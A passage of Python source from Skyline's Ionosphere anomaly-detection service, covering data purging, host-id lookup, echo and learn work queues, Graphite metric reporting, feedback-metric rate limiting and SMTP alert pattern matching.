if settings.IONOSPHERE_LEARN:
try:
logger.info('purging any old learning data')
self.purge_old_data_dirs(
settings.IONOSPHERE_LEARN_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR)
except:
logger.error('error :: purge_old_data_dirs learn - %s' % traceback.format_exc())
if ENABLE_IONOSPHERE_DEBUG:
logger.info(
'debug :: self.purge_old_data_dirs(%s, %s)' % (
settings.IONOSPHERE_LEARN_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR))
else:
logger.info('purge is not managed by Ionosphere - IONOSPHERE_MANAGE_PURGE = %s' % str(IONOSPHERE_MANAGE_PURGE))
# @added 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Still manage training data
try:
last_purge_timestamp = self.redis_conn.get(last_purge_key)
except:
logger.error('error :: failed to get Redis key %s' % last_purge_key)
last_purge_timestamp = 0
if not last_purge_timestamp:
try:
logger.info('running purge_old_data_dirs only to manage ionosphere.training_data')
self.purge_old_data_dirs(
settings.IONOSPHERE_DATA_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR)
except:
logger.error('error :: purge_old_data_dirs - %s' % traceback.format_exc())
# @added 20170916 - Feature #1996: Ionosphere - matches page
# Create the ionosphere_summary_memcache_object
# @modified 20180103 - Feature #1996: Ionosphere - matches page
# The ionosphere_summary_list memcache object is not managed in
# ionosphere.py and was an artefact of some dev work that may
# resume at some point
# if settings.MEMCACHE_ENABLED:
# try:
# logger.info('updating the ionosphere_summary_memcache_object')
# self.update_ionosphere_summary_memcache_object
# except:
# logger.error('error :: update_ionosphere_summary_memcache_object - %s' % traceback.print_exc())
# Populate the database metadata tables
# What is my host id in the Skyline panorama DB?
host_id = False
# @added 20170825 - Task #2132: Optimise Ionosphere DB usage
# Check memcached before MySQL
if settings.MEMCACHE_ENABLED:
hosts_id_key = 'hosts.id.%s' % this_host
try:
# @modified 20191029 - Task #3304: py3 - handle pymemcache bytes not str
# host_id = self.memcache_client.get(hosts_id_key)
if python_version == 2:
host_id = self.memcache_client.get(hosts_id_key)
else:
host_id = self.memcache_client.get(hosts_id_key).decode('utf-8')
# if memcache does not have the key the response to the
# client is None, it does not except
except:
logger.error('error :: failed to get %s from memcache' % hosts_id_key)
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
if host_id:
logger.info('using memcache %s key data' % hosts_id_key)
logger.info('host_id: %s' % str(host_id))
if not host_id:
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
query = 'select id FROM hosts WHERE host=\'%s\'' % this_host # nosec
results = mysql_select(skyline_app, query)
if results:
host_id = results[0][0]
logger.info('host_id: %s' % str(host_id))
else:
logger.info('failed to determine host id of %s' % this_host)
if host_id and settings.MEMCACHE_ENABLED:
try:
self.memcache_client.set(hosts_id_key, int(host_id))
logger.info('populated memcache %s key' % hosts_id_key)
except:
logger.error('error :: failed to set %s in memcache' % hosts_id_key)
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
# if not known - INSERT hostname INTO host
if not host_id:
logger.info('inserting %s into hosts table' % this_host)
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
query = 'insert into hosts (host) VALUES (\'%s\')' % this_host # nosec
host_id = self.mysql_insert(query)
if host_id:
logger.info('new host_id: %s' % str(host_id))
if not host_id:
logger.error(
'error :: failed to determine or populate %s in the hosts table' %
this_host)
sleep(30)
continue
"""
Determine if any metric check files have been added and need to be processed
"""
# while True:
while 1:
metric_var_files = False
try:
metric_var_files = [f for f in listdir(settings.IONOSPHERE_CHECK_PATH) if isfile(join(settings.IONOSPHERE_CHECK_PATH, f))]
except:
logger.error('error :: failed to list files in check dir')
logger.info(traceback.format_exc())
# @added 20200109 - Feature #3380: Create echo features profile when a Mirage features profile is created
# Process the ionosphere.echo.work queue as echo features
# profiles cannot be easily shoehorned into the
# ionosphere.learn.work pipeline
try:
ionosphere_echo_enabled = settings.IONOSPHERE_ECHO_ENABLED
except:
ionosphere_echo_enabled = False
echo_job = False
if not metric_var_files and ionosphere_echo_enabled:
ionosphere_echo_work = None
echo_job = False
try:
ionosphere_echo_work = self.redis_conn_decoded.smembers('ionosphere.echo.work')
except Exception as e:
logger.error('error :: could not query Redis for ionosphere.echo.work - %s' % e)
if ionosphere_echo_work:
echo_work_queue_items = len(ionosphere_echo_work)
if echo_work_queue_items > 0:
echo_job = True
logger.info('processing an ionosphere.echo.work item')
if echo_job:
echo_base_name = None
for ionosphere_echo_work_item in ionosphere_echo_work:
try:
echo_metric_list = literal_eval(ionosphere_echo_work_item)
echo_metric_timestamp = int(echo_metric_list[2])
echo_base_name = str(echo_metric_list[3])
echo_full_duration = int(echo_metric_list[6])
break
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine details from ionosphere_echo_work item')
continue
if not echo_base_name:
echo_job = False
if echo_job:
# When an item is in the ionosphere.echo.work set it needs
# metric_echo_check_file created to pass to process_ionosphere_echo
echo_metric_check_file = '%s/%s.%s.echo.txt' % (
settings.SKYLINE_TMP_DIR, str(echo_metric_timestamp),
echo_base_name)
echo_create_fp_metric_key = 'ionosphere.%s.%s.echo_create_check' % (
str(echo_metric_timestamp), echo_base_name)
echo_create_fp_metric_count = 1
try:
echo_create_fp_metric_count = self.redis_conn.get(echo_create_fp_metric_key)
except Exception as e:
logger.error('error :: could not query Redis for %s: %s' % (echo_create_fp_metric_key, e))
if not echo_create_fp_metric_count:
echo_create_fp_metric_count = 1
else:
echo_create_fp_metric_count = int(echo_create_fp_metric_count) + 1
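# The echo_create_fp_metric_count counter is kept in Redis (with a
# 3600 second TTL set further down) so that repeated failures to
# create an echo features profile for the same metric and timestamp
# are capped at 3 attempts rather than looping indefinitely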
if os.path.isfile(str(echo_metric_check_file)):
logger.error('error :: echo_metric_check_file - %s already exists, removing' % (
echo_metric_check_file))
self.remove_metric_check_file(echo_metric_check_file)
if echo_create_fp_metric_count >= 3:
logger.error('error :: echo_create_fp_metric_count is %s, no further attempts will be made to create an echo fp for %s' % (
str(echo_create_fp_metric_count), str(echo_metric_list)))
logger.info('removing ionosphere.echo.work item %s' % (
str(echo_metric_list)))
work_set = 'ionosphere.echo.work'
try:
self.redis_conn.srem(work_set, str(echo_metric_list))
logger.info('removed work item - %s - from Redis set - %s' % (str(echo_metric_list), work_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove work item list from Redis set - %s' % work_set)
echo_job = False
if echo_job:
check_data = 'metric = \'%s\'\n' \
'metric_timestamp = \'%s\'\n' \
'added_by = \'%s\'\n' \
'full_duration = \'%s\'\n' \
% (str(echo_base_name), str(echo_metric_timestamp),
'webapp', str(echo_full_duration))
echo_metric_check_file_created = False
try:
write_data_to_file(skyline_app, echo_metric_check_file, 'w', check_data)
logger.info('added ionosphere.echo.work item check file for process_ionosphere_echo - %s' % (
echo_metric_check_file))
echo_metric_check_file_created = True
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add ionosphere.echo.work item check file for process_ionosphere_echo - %s' % (
echo_metric_check_file))
if echo_metric_check_file_created:
# Set a Redis key so that if the echo fp creation fails
# a continuous loop to try to create it does not occur
try:
self.redis_conn.setex(echo_create_fp_metric_key, 3600, echo_create_fp_metric_count)
logger.info('updated Redis key %s' % echo_create_fp_metric_key)
except:
logger.error('error :: failed to update Redis key %s' % echo_create_fp_metric_key)
# Spawn a single process_ionosphere_echo process
function_name = 'process_ionosphere_echo'
pids = []
spawned_pids = []
pid_count = 0
now = time()
for i in range(1, IONOSPHERE_PROCESSES + 1):
try:
p = Process(target=self.process_ionosphere_echo, args=(i, echo_metric_check_file))
pids.append(p)
pid_count += 1
logger.info(
'starting %s of %s %s for ionosphere.echo.work item' % (
str(pid_count), str(IONOSPHERE_PROCESSES),
function_name))
p.start()
spawned_pids.append(p.pid)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to start %s for ionosphere.echo.work item' % function_name)
continue
# Self monitor the process and terminate if the
# process_ionosphere_echo has run for too long
try:
ionosphere_echo_max_fp_create_time = settings.IONOSPHERE_ECHO_MAX_FP_CREATE_TIME
except:
ionosphere_echo_max_fp_create_time = 55
p_starts = time()
while time() - p_starts <= ionosphere_echo_max_fp_create_time:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info(
'%s %s completed in %.2f seconds for ionosphere.echo.work item' % (
str(IONOSPHERE_PROCESSES),
function_name, time_to_run))
work_set = 'ionosphere.echo.work'
try:
self.redis_conn.srem(work_set, str(echo_metric_list))
logger.info('removed work item - %s - from Redis set - %s' % (str(echo_metric_list), work_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove work item list from Redis set - %s' % work_set)
self.remove_metric_check_file(echo_metric_check_file)
break
else:
# We only enter this if we didn't 'break' above.
logger.info('timed out, killing all %s processes for ionosphere.echo.work item' % (function_name))
for p in pids:
try:
p.terminate()
# p.join()
logger.info('killed %s process for ionosphere.echo.work item' % (function_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: killing all %s processes for ionosphere.echo.work item' % function_name)
if not metric_var_files:
logger.info('sleeping 20 no metric check files')
sleep(20)
up_now = time()
# Report app up
try:
self.redis_conn.setex(skyline_app, 120, up_now)
logger.info('updated Redis key for %s up' % skyline_app)
except:
logger.error('error :: failed to update Redis key for %s up' % skyline_app)
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# Branch #922: Ionosphere
# Bringing Ionosphere online - do alert on Ionosphere metrics
# Manage the ionosphere.unique_metrics Redis set which is queried
# by Analyzer and Mirage, yes and we use multiprocessing
last_update = None
try:
last_update = self.redis_conn.get('ionosphere.manage_ionosphere_unique_metrics')
except Exception as e:
logger.error('error :: could not query Redis for ionosphere.manage_ionosphere_unique_metrics: %s' % e)
if not last_update:
pids = []
now = time()
try:
logger.info('starting manage_ionosphere_unique_metrics process')
p = Process(target=self.manage_ionosphere_unique_metrics)
pids.append(p)
p.start()
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to start manage_ionosphere_unique_metrics')
# Self monitor process and terminate if run for too long
p_starts = time()
# @modified 20200507 - increase the allowed time
# while time() - p_starts <= 5:
while time() - p_starts <= 20:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info(
'manage_ionosphere_unique_metrics completed in %.2f seconds' % (
time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('%s :: timed out, killing manage_ionosphere_unique_metrics process' % (skyline_app))
for p in pids:
try:
p.terminate()
# p.join()
logger.info('%s :: killed manage_ionosphere_unique_metrics process' % (skyline_app))
except:
logger.error(traceback.format_exc())
logger.error('error :: killing all manage_ionosphere_unique_metrics processes')
# Discover metric anomalies to insert
metric_var_files = False
try:
metric_var_files = [f for f in listdir(settings.IONOSPHERE_CHECK_PATH) if isfile(join(settings.IONOSPHERE_CHECK_PATH, f))]
logger.info('metric check files found - %s' % str(len(metric_var_files)))
except:
logger.error('error :: failed to list files in check dir')
logger.info(traceback.format_exc())
# @added 20170104 - Feature #1842: Ionosphere - Graphite now graphs
# Task #1658: Patterning Skyline Ionosphere
# Send Ionosphere metrics to Graphite every minute now that
# Ionosphere is better tuned and Reset lists
cache_key = '%s.sent_graphite_metrics' % skyline_app
redis_sent_graphite_metrics = False
try:
redis_sent_graphite_metrics = self.redis_conn.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for key %s: %s' % (cache_key, e))
# Flush metrics to Graphite
if not redis_sent_graphite_metrics:
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# not_anomalous = str(len(self.not_anomalous))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# not_anomalous = str(len(list(self.redis_conn.smembers('ionosphere.not_anomalous'))))
not_anomalous = str(len(list(self.redis_conn_decoded.smembers('ionosphere.not_anomalous'))))
except:
not_anomalous = '0'
logger.info('not_anomalous :: %s' % not_anomalous)
send_metric_name = '%s.not_anomalous' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, not_anomalous)
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis set instead of Manager() list
# total_anomalies = str(len(self.anomalous_metrics))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# total_anomalies = str(len(list(self.redis_conn.smembers('ionosphere.anomalous_metrics'))))
total_anomalies = str(len(list(self.redis_conn_decoded.smembers('ionosphere.anomalous_metrics'))))
except:
total_anomalies = '0'
logger.info('total_anomalies :: %s' % total_anomalies)
send_metric_name = '%s.total_anomalies' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, total_anomalies)
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# training_metrics = str(len(self.training_metrics))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# training_metrics = str(len(list(self.redis_conn.smembers('ionosphere.training_metrics'))))
training_metrics = str(len(list(self.redis_conn_decoded.smembers('ionosphere.training_metrics'))))
except:
training_metrics = '0'
logger.info('training metrics :: %s' % training_metrics)
send_metric_name = '%s.training_metrics' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, training_metrics)
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# features_profiles_checked = str(len(self.features_profiles_checked))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# features_profiles_checked = str(len(list(self.redis_conn.smembers('ionosphere.features_profiles_checked'))))
features_profiles_checked = str(len(list(self.redis_conn_decoded.smembers('ionosphere.features_profiles_checked'))))
except:
features_profiles_checked = '0'
logger.info('fps checked count :: %s' % features_profiles_checked)
send_metric_name = '%s.fps_checked' % skyline_app_graphite_namespace
# @modified 20170306 - Feature #1960: ionosphere_layers
# Corrected namespace
# send_graphite_metric(skyline_app, send_metric_name, not_anomalous)
send_graphite_metric(skyline_app, send_metric_name, features_profiles_checked)
# @added 20170306 - Feature #1960: ionosphere_layers
try:
# @modified 20181014 - Feature #2430: Ionosphere validate learnt features profiles page
# layers_checked = str(len(self.layers_checked))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# str_layers_checked = str(len(self.layers_checked))
str_layers_checked = str(len(list(self.redis_conn.smembers('ionosphere.layers_checked'))))
except:
str_layers_checked = '0'
logger.info('layers checked count :: %s' % str_layers_checked)
send_metric_name = '%s.layers_checked' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, str_layers_checked)
if settings.PANORAMA_ENABLED:
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# sent_to_panorama = str(len(self.sent_to_panorama))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# sent_to_panorama = str(len(list(self.redis_conn.smembers('ionosphere.sent_to_panorama'))))
sent_to_panorama = str(len(list(self.redis_conn_decoded.smembers('ionosphere.sent_to_panorama'))))
except:
sent_to_panorama = '0'
logger.info('sent_to_panorama :: %s' % sent_to_panorama)
send_metric_name = '%s.sent_to_panorama' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, sent_to_panorama)
sent_graphite_metrics_now = int(time())
try:
self.redis_conn.setex(cache_key, 59, sent_graphite_metrics_now)
logger.info('updated Redis key - %s' % cache_key)
except:
logger.error('error :: failed to update Redis key - %s up' % cache_key)
# Reset lists
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets instead of Manager().list()
# self.anomalous_metrics[:] = []
# self.not_anomalous[:] = []
# self.features_profiles_checked[:] = []
# self.training_metrics[:] = []
# self.sent_to_panorama[:] = []
# @added 20170306 - Feature #1960: ionosphere_layers
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets instead of Manager().list()
# self.layers_checked[:] = []
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets instead of Manager().list()
delete_redis_sets = [
'ionosphere.anomalous_metrics',
'ionosphere.not_anomalous',
'ionosphere.features_profiles_checked',
'ionosphere.training_metrics',
'ionosphere.sent_to_panorama',
'ionosphere.layers_checked',
]
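# These Redis sets are the per-interval counters flushed to Graphite
# above, so they are deleted after each send to start the next
# reporting interval from zero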
for i_redis_set in delete_redis_sets:
redis_set_to_delete = i_redis_set
try:
self.redis_conn.delete(redis_set_to_delete)
logger.info('deleted Redis set - %s' % redis_set_to_delete)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to delete Redis set - %s' % redis_set_to_delete)
ionosphere_job = False
learn_job = False
# @added 20190524 - Bug #3050: Ionosphere - Skyline and Graphite feedback
# Do not run checks if the namespace is a declared SKYLINE_FEEDBACK_NAMESPACES
# namespace that has been checked in the last 10 minutes if
# there are multiple checks to do.
rate_limit_feedback_metrics = False
if metric_var_files:
metric_var_files_sorted = sorted(metric_var_files)
metric_check_file = '%s/%s' % (settings.IONOSPHERE_CHECK_PATH, str(metric_var_files_sorted[0]))
metric_var_files_count = len(metric_var_files_sorted)
if metric_var_files_count > 2:
rate_limit_feedback_metrics = True
logger.info('rate_limit_feedback_metrics set to %s' % (str(rate_limit_feedback_metrics)))
if rate_limit_feedback_metrics:
for i_metric_check_file in metric_var_files_sorted:
feedback_metric = False
check_metric_file_list = i_metric_check_file.split('.', -1)[1:]
last_name_element = len(check_metric_file_list) - 1
base_name = '.'.join(check_metric_file_list[0:last_name_element])
metric_namespace_elements = base_name.split('.')
for to_skip in SKYLINE_FEEDBACK_NAMESPACES:
if to_skip in base_name:
feedback_metric = True
logger.info('SKYLINE_FEEDBACK_NAMESPACES matched on to_skip %s in base_name %s' % (to_skip, base_name))
break
to_skip_namespace_elements = to_skip.split('.')
elements_matched = set(metric_namespace_elements) & set(to_skip_namespace_elements)
if len(elements_matched) == len(to_skip_namespace_elements):
feedback_metric = True
logger.info('SKYLINE_FEEDBACK_NAMESPACES matched elements in %s' % base_name)
break
if feedback_metric:
remove_feedback_metric_check = False
if metric_var_files_count > 4:
logger.info('rate limiting feedback metric, removing check for %s as Ionosphere has %s pending checks, not checking feedback metric' % (
base_name, str(metric_var_files_count)))
remove_feedback_metric_check = True
cache_key = 'ionosphere.feedback_metric.checked.%s' % (base_name)
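# This Redis key is set when a feedback metric check is done, so its presence
# indicates the metric has been checked within the last 600 seconds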
check_done = False
try:
check_done = self.redis_conn.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
if not check_done:
logger.info('not removing feedback metric as no check has been done in last 600 seconds on %s' % base_name)
else:
logger.info('rate limiting feedback metric, removing check as %s has been checked in the last 600 seconds' % (
base_name))
remove_feedback_metric_check = True
if remove_feedback_metric_check:
metric_check_file = '%s/%s' % (settings.IONOSPHERE_CHECK_PATH, i_metric_check_file)
self.remove_metric_check_file(str(metric_check_file))
# @added 20200907 - Feature #3734: waterfall alerts
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp]
redis_set = 'analyzer.waterfall_alerts.sent_to_ionosphere'
metric_check_file_timestamp = i_metric_check_file.split('.', -1)[0]
literal_waterfall_alerts = []
try:
literal_waterfall_alerts = list(self.redis_conn_decoded.smembers(redis_set))
except:
literal_waterfall_alerts = []
waterfall_alerts = []
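# Each set member is the str() of a waterfall alert list -
# [metric, timestamp, value, added_to_waterfall_timestamp] - so literal_eval
# is used to restore it before comparing the metric and timestamp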
for literal_waterfall_alert in literal_waterfall_alerts:
waterfall_alert = literal_eval(literal_waterfall_alert)
waterfall_alerts.append(waterfall_alert)
for waterfall_alert in waterfall_alerts:
if waterfall_alert[0] == base_name:
if int(waterfall_alert[1]) == int(metric_check_file_timestamp):
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed feedback metric waterfall alert item from Redis set %s - %s' % (
redis_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove feedback metric waterfall alert item for %s from Redis set %s' % (
base_name, redis_set))
redis_set = 'mirage.waterfall_alerts.sent_to_ionosphere'
literal_waterfall_alerts = []
try:
literal_waterfall_alerts = list(self.redis_conn_decoded.smembers(redis_set))
except:
literal_waterfall_alerts = []
waterfall_alerts = []
for literal_waterfall_alert in literal_waterfall_alerts:
waterfall_alert = literal_eval(literal_waterfall_alert)
waterfall_alerts.append(waterfall_alert)
for waterfall_alert in waterfall_alerts:
if waterfall_alert[0] == base_name:
if int(waterfall_alert[1]) == int(metric_check_file_timestamp):
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed feedback metric waterfall alert item from Redis set %s - %s' % (
redis_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove feedback metric waterfall alert item for %s from Redis set %s' % (
base_name, redis_set))
# Determine metric_var_files after possible feedback metric removals
metric_var_files = False
try:
metric_var_files = [f for f in listdir(settings.IONOSPHERE_CHECK_PATH) if isfile(join(settings.IONOSPHERE_CHECK_PATH, f))]
except:
logger.error('error :: failed to list files in check dir')
logger.info(traceback.format_exc())
# @added 20200414 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Prioritise realtime metric checks over analyzer_batch checks,
# because if a lot of anomalies are submitted from analyzer_batch
# and they are processed first, then realtime metrics waiting to
# be processed could exceed the max_age_seconds time limit. Batch
# anomalies are not subject to the max_age_seconds check,
# therefore they will get done in due course.
prioritise_realtime_checks = True
remove_batch_anomalies_check_files = []
realtime_metric_var_files_count = 0
batch_metric_var_files_count = 0
# If there are realtime metric anomalies and batch metric
# anomalies prioritise the realtime checks by removing the
# batch anomaly checks from the metric_var_files
if metric_var_files and prioritise_realtime_checks and BATCH_PROCESSING:
if rate_limit_feedback_metrics:
prioritise_realtime_checks = False
logger.info('prioritise_realtime_checks set to %s' % (str(prioritise_realtime_checks)))
try:
metric_var_files_sorted = []
if metric_var_files:
metric_var_files_sorted = sorted(metric_var_files)
# logger.info('prioritise_realtime_checks checking %s metrics for batch anomalies' % (str(len(metric_var_files_sorted))))
for i_metric_check_file in metric_var_files_sorted:
analyzer_batch_anomaly = None
check_file_anomaly_timestamp = None
try:
check_metric_file_list = i_metric_check_file.split('.', -1)[1:]
last_name_element = len(check_metric_file_list) - 1
base_name = '.'.join(check_metric_file_list[0:last_name_element])
i_metric_check_filename = i_metric_check_file.replace(settings.IONOSPHERE_CHECK_PATH + '/', '')
check_file_anomaly_timestamp = i_metric_check_filename.split('.', 1)[0]
except Exception as e:
logger.error('error :: could not determine anomaly_timestamp from filename %s - %s' % (
i_metric_check_file, str(e)))
check_file_anomaly_timestamp = None
# Is this an analyzer_batch related anomaly
if check_file_anomaly_timestamp:
analyzer_batch_metric_anomaly_key = 'analyzer_batch.anomaly.%s.%s' % (
str(check_file_anomaly_timestamp), base_name)
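# analyzer_batch creates this Redis key when it submits an anomaly, so its
# presence identifies the check as a batch anomaly rather than a realtime one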
try:
analyzer_batch_anomaly = self.redis_conn.get(analyzer_batch_metric_anomaly_key)
except Exception as e:
logger.error(
'error :: could not query cache_key - %s - %s' % (
analyzer_batch_metric_anomaly_key, e))
analyzer_batch_anomaly = None
if analyzer_batch_anomaly:
logger.info('batch processing - identified as an analyzer_batch triggered anomaly from the presence of the Redis key %s' % analyzer_batch_metric_anomaly_key)
remove_batch_anomalies_check_files.append(i_metric_check_file)
batch_metric_var_files_count += 1
else:
realtime_metric_var_files_count += 1
# logger.info('batch processing - no batch anomaly Redis key found - %s' % analyzer_batch_metric_anomaly_key)
# @added 20200414 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# If there are realtime metric anomalies and batch metric
# anomalies prioritise the realtime checks by removing the
# batch anomaly checks from the metric_var_files
realtime_metric_var_files = []
if realtime_metric_var_files_count > 0:
if remove_batch_anomalies_check_files:
for metric_var_file in metric_var_files_sorted:
if metric_var_file in remove_batch_anomalies_check_files:
logger.info('removing batch anomaly check file to prioritise realtime metric checks - %s' % str(metric_var_file))
else:
realtime_metric_var_files.append(metric_var_file)
if realtime_metric_var_files:
realtime_metric_var_files_count = len(realtime_metric_var_files)
metric_var_files = realtime_metric_var_files
logger.info('removed %s batch anomaly check files from metric_var_files list to prioritise the %s realtime metric checks' % (
str(batch_metric_var_files_count),
str(realtime_metric_var_files_count)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine batch anomalies')
if metric_var_files:
ionosphere_job = True
logger.info('%s metric check files, so set to ionosphere_job = True' % (str(len(metric_var_files))))
break
# @added 20170113 - Feature #1854: Ionosphere learn
# Added the learn variable to spawn a spawn_learn_process when
# required.
work_queue_items = 0
if settings.IONOSPHERE_LEARN:
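# Any items in the ionosphere.learn.work Redis set represent queued learn
# work which requires a spawn_learn_process to be spawned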
learn_work = None
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# learn_work = self.redis_conn.smembers('ionosphere.learn.work')
learn_work = self.redis_conn_decoded.smembers('ionosphere.learn.work')
except Exception as e:
logger.error('error :: could not query Redis for ionosphere.learn.work - %s' % e)
if learn_work:
work_queue_items = len(learn_work)
if work_queue_items > 0:
learn_job = True
if learn_job:
break
# @added 20190404 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Do not run an Ionosphere and echo checks on a metrics when a lot of
# checks are being done. Manage the Ionosphere load and increased
# runtime in general that Ionosphere echo has introduced, especially
# when Ionosphere is issued lots of checks, if lots of metrics suddenly
# become anomalous.
metric_var_files_count = 0
ionosphere_busy = False
if ionosphere_job:
metric_var_files_sorted = sorted(metric_var_files)
metric_check_file = '%s/%s' % (settings.IONOSPHERE_CHECK_PATH, str(metric_var_files_sorted[0]))
# @added 20190403 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Added a count of the number of checks to be done
metric_var_files_count = len(metric_var_files)
# If there are more than 4 metric check files set Ionosphere to
# busy so that Ionosphere alternates between checking the normal
# Ionosphere Mirage features profiles and the Ionosphere echo
# features profiles on subsequent checks of a metric so that
# when Ionosphere is busy it is not checking both sets of
# features profiles on every run.
if metric_var_files_count > 4:
ionosphere_busy = True
# @added 20170108 - Feature #1830: Ionosphere alerts
# Adding lists of smtp_alerter_metrics and ionosphere_non_smtp_alerter_metrics
# Timed this takes 0.013319 seconds on 689 unique_metrics
unique_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))
unique_metrics = list(self.redis_conn_decoded.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get the unique_metrics list from Redis')
unique_metrics = []
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# The Redis ionosphere.ionosphere_smtp_alerter_metrics set is used here to
# replace the self.ionosphere_smtp_alerter_metrics Manager.list in the below
# section
ionosphere_smtp_alerter_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_smtp_alerter_metrics = list(self.redis_conn.smembers('ionosphere.ionosphere_smtp_alerter_metrics'))
ionosphere_smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('ionosphere.ionosphere_smtp_alerter_metrics'))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to generate a list from the ionosphere_smtp_alerter_metrics Redis set')
ionosphere_smtp_alerter_metrics = []
redis_sets_to_rename = [
'ionosphere.ionosphere_smtp_alerter_metrics',
'ionosphere.ionosphere_non_smtp_alerter_metrics'
]
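# Rename the sets populated on the previous run to .old so that they are
# rebuilt fresh below, the .old sets are deleted at the end of the run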
for current_redis_set in redis_sets_to_rename:
new_redis_set = '%s.old' % current_redis_set
try:
self.redis_conn.rename(current_redis_set, new_redis_set)
except Exception as e:
if str(e) == 'no such key':
logger.info('could not rename Redis set %s to %s: %s' % (
current_redis_set, new_redis_set, str(e)))
else:
logger.error('error :: could not rename Redis set %s to %s: %s' % (
current_redis_set, new_redis_set, str(e)))
for metric_name in unique_metrics:
# @modified 20200728 - Bug #3652: Handle multiple metrics in base_name conversion
# base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
if metric_name.startswith(settings.FULL_NAMESPACE):
base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
else:
base_name = metric_name
for alert in settings.ALERTS:
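# Each alert tuple holds the metric namespace or pattern in alert[0] and the
# alerter type in alert[1], only smtp alerter entries are considered, matched
# first by regex and then by substring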
pattern_match = False
if str(alert[1]) == 'smtp':
ALERT_MATCH_PATTERN = alert[0]
METRIC_PATTERN = base_name
pattern_match = False
try:
# Match by regex
alert_match_pattern = re.compile(ALERT_MATCH_PATTERN)
pattern_match = alert_match_pattern.match(METRIC_PATTERN)
if pattern_match:
pattern_match = True
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# if base_name not in self.ionosphere_smtp_alerter_metrics:
if base_name not in ionosphere_smtp_alerter_metrics:
# self.ionosphere_smtp_alerter_metrics.append(base_name)
redis_set = 'ionosphere.ionosphere_smtp_alerter_metrics'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
except:
pattern_match = False
if not pattern_match:
# Match by substring
if alert[0] in base_name:
